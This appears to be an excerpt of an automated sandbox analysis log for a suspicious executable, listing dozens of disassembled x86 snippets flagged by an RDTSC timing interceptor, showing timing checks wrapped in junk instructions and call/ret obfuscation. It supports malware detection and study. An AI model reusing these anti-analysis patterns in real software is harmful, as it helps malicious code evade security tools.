Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78B7D9 second address: 78B835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub esi, 5CCD13FBh 0x00000010 push 00000000h 0x00000012 call 00007FECC5476B38h 0x00000017 mov edi, dword ptr [ebp+122D2C9Ah] 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FECC5476B28h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a push eax 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78B835 second address: 78B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78B629 second address: 78B63F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECC5476B2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78DE28 second address: 78DE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126369h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78DE46 second address: 78DE4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78DE4C second address: 78DE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78DE50 second address: 78DEB9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e jmp 00007FECC5476B2Ch 0x00000013 pop esi 0x00000014 nop 0x00000015 and si, 5A4Dh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FECC5476B28h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007FECC5476B30h 0x00000041 jmp 00007FECC5476B33h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78DEB9 second address: 78DEBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78DB94 second address: 78DB9E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 78E7CA second address: 78E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7941B9 second address: 7941BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7941BD second address: 7941C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7941C3 second address: 79422E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECC5476B28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D3327h], esi 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+1245A9F9h], edi 0x0000001b push 00000000h 0x0000001d jmp 00007FECC5476B38h 0x00000022 xchg eax, esi 0x00000023 jng 00007FECC5476B42h 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c jmp 00007FECC5476B38h 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FECC5476B2Fh 0x0000003b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79422E second address: 794238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7906D6 second address: 7906E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7906E7 second address: 7906ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7906ED second address: 7906F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79530D second address: 795312 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7954E8 second address: 7954F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FECC5476B26h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79731F second address: 797323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7982ED second address: 7982F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7982F1 second address: 7982FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 797506 second address: 79751D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79751D second address: 797523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 797523 second address: 797527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 797527 second address: 79758D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+124520AFh], ecx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jnp 00007FECC512635Ah 0x0000001f mov bx, D82Ah 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a adc edi, 6E5C92CFh 0x00000030 mov eax, dword ptr [ebp+122D0CADh] 0x00000036 and di, 87E0h 0x0000003b push FFFFFFFFh 0x0000003d stc 0x0000003e nop 0x0000003f jmp 00007FECC512635Dh 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jl 00007FECC5126358h 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7985C0 second address: 7985CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7985CA second address: 7985CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7985CE second address: 7985ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 799698 second address: 79969C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79969C second address: 7996A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79C85A second address: 79C85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79C85E second address: 79C864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79D8C4 second address: 79D8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FECC5126367h 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79D8E2 second address: 79D8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79C96E second address: 79CA09 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC512635Ch 0x00000008 jnl 00007FECC5126356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FECC5126358h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D3A79h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a stc 0x0000003b mov ebx, edx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov bh, 84h 0x00000046 mov eax, dword ptr [ebp+122D117Dh] 0x0000004c mov dword ptr [ebp+122D30A0h], esi 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007FECC5126358h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 0000001Dh 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e sub dword ptr [ebp+122D297Ah], eax 0x00000074 nop 0x00000075 push esi 0x00000076 jng 00007FECC512635Ch 0x0000007c pop esi 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pushad 0x00000082 popad 0x00000083 pop ecx 0x00000084 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79CA09 second address: 79CA14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FECC5476B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79E95D second address: 79E961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79E961 second address: 79E9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3A35h] 0x00000010 mov bl, D6h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FECC5476B28h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e movsx ebx, cx 0x00000031 sub dword ptr [ebp+122D37A9h], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FECC5476B28h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FECC5476B36h 0x0000005b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 79EBC5 second address: 79EBCF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECC512635Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A0BBF second address: 7A0BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A0BC6 second address: 7A0BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A1C6F second address: 7A1C81 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECC5476B28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A1C81 second address: 7A1C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A1C85 second address: 7A1C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A1D57 second address: 7A1D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A3BBA second address: 7A3BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FECC5476B26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A3BC5 second address: 7A3BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A3BCB second address: 7A3BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AACAB second address: 7AACAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AACAF second address: 7AACD2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007FECC5476B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FECC5476B37h 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AACD2 second address: 7AACDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FECC5126356h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AACDE second address: 7AAD0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B36h 0x00000007 jng 00007FECC5476B26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FECC5476B26h 0x00000017 jp 00007FECC5476B26h 0x0000001d rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AAD0C second address: 7AAD40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FECC5126365h 0x00000013 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AAD40 second address: 7AAD5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AAD5C second address: 7AAD73 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECC512635Bh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AA89F second address: 7AA8B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7AA8B4 second address: 7AA8BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A3D33 second address: 7A3D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7A3D37 second address: 7A3D41 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B2027 second address: 7B202B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B8636 second address: 7B8660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126364h 0x00000007 jnp 00007FECC512635Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B8660 second address: 7B8666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B8666 second address: 7B866A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B731A second address: 7B7338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECC5476B36h 0x0000000d rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B7932 second address: 7B7937 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B7AAE second address: 7B7AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FECC5476B36h 0x0000000b jnl 00007FECC5476B26h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FECC5476B2Eh 0x0000001a pushad 0x0000001b popad 0x0000001c js 00007FECC5476B26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B7AEC second address: 7B7AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B7F15 second address: 7B7F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B7F1B second address: 7B7F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B81EF second address: 7B81F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B81F3 second address: 7B822F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126361h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jns 00007FECC5126356h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FECC5126369h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7B822F second address: 7B8233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7915D8 second address: 7915F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FECC512635Fh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7916B3 second address: 7916B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7916B7 second address: 7916D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECC5126367h 0x0000000f rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7916D8 second address: 7916E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FECC5476B26h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 791B0D second address: 791B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FECC5126358h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 pushad 0x00000025 call 00007FECC512635Dh 0x0000002a pop ecx 0x0000002b mov dword ptr [ebp+122D3355h], esi 0x00000031 popad 0x00000032 push 00000004h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007FECC5126358h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 jc 00007FECC512635Ch 0x00000057 jns 00007FECC5126356h 0x0000005d rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 791E9C second address: 791F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FECC5476B2Fh 0x0000000b pop esi 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FECC5476B28h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a sub ecx, 35182D85h 0x00000030 push 0000001Eh 0x00000032 mov ecx, dword ptr [ebp+122D3919h] 0x00000038 nop 0x00000039 pushad 0x0000003a jmp 00007FECC5476B38h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FECC5476B2Ah 0x00000046 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7920B2 second address: 792101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FECC5126366h 0x0000000c jmp 00007FECC512635Ah 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 je 00007FECC512636Ch 0x0000001b jmp 00007FECC5126366h 0x00000020 jl 00007FECC512635Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
